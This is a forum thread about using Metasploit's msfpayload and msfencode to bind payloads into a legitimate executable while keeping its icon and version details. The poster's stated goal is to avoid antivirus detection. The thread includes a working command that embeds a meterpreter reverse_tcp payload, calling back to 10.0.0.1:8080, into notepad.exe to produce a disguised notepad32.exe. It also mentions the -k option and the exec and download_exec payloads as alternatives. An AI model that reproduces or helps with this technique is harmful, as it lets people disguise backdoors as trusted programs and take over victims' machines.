Metasploit msfpayload | using an existing executable?
Hello,
I'm trying to bind two executables with msfpayload and the msfencode features. However, I'm not sure that msfpayload will accept a preexisting executable instead of an input like 'windows/meterpreter/reverse_tcp'.
This is what I would normally use:
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=8080 R | ./msfencode -t exe -x notepad.exe -o notepad32.exe
This is what I'm trying to do:
./msfpayload MYFILE.exe X | ./msfencode -t exe -x notepad.exe -o notepad32.exe
Does msfpayload allow this type of executable input? If so, what am I doing wrong?
Re: Metasploit msfpayload | using an existing executable?
No. It does not. As expected it handles payloads/shellcode. I am not even sure what would you try to accomplish with this?
Re: Metasploit msfpayload | using an existing executable?
That's too bad..
It would be a quick fix for what I need. I'm basically trying to bind two executables together while retaining the icon and 'Version' info of the original executable. I figured AVs would not scream bloody murder if I used something other than the widely available exe binders without having to purchase unique stubs...
Re: Metasploit msfpayload | using an existing executable?
Google is your friend.
"metasploit using existing executables" returns
Metasploit Framework - Support #1244: msfencode an exploit into an existing exe - Metasploit Redmine Interface
Which when read states exactly what the combo is used for.
Re: Metasploit msfpayload | using an existing executable?
Re: Metasploit msfpayload | using an existing executable?
Thanks for the info, those links increased the size of my brain.
Since my original idea is not feasible, I've opted to go with the windows/exec payload(or maybe download_exec). I wasn't aware of the -k option. That effectively allows me to change strategy. My situation seems to be resolved... :)
Many thanks for the help!
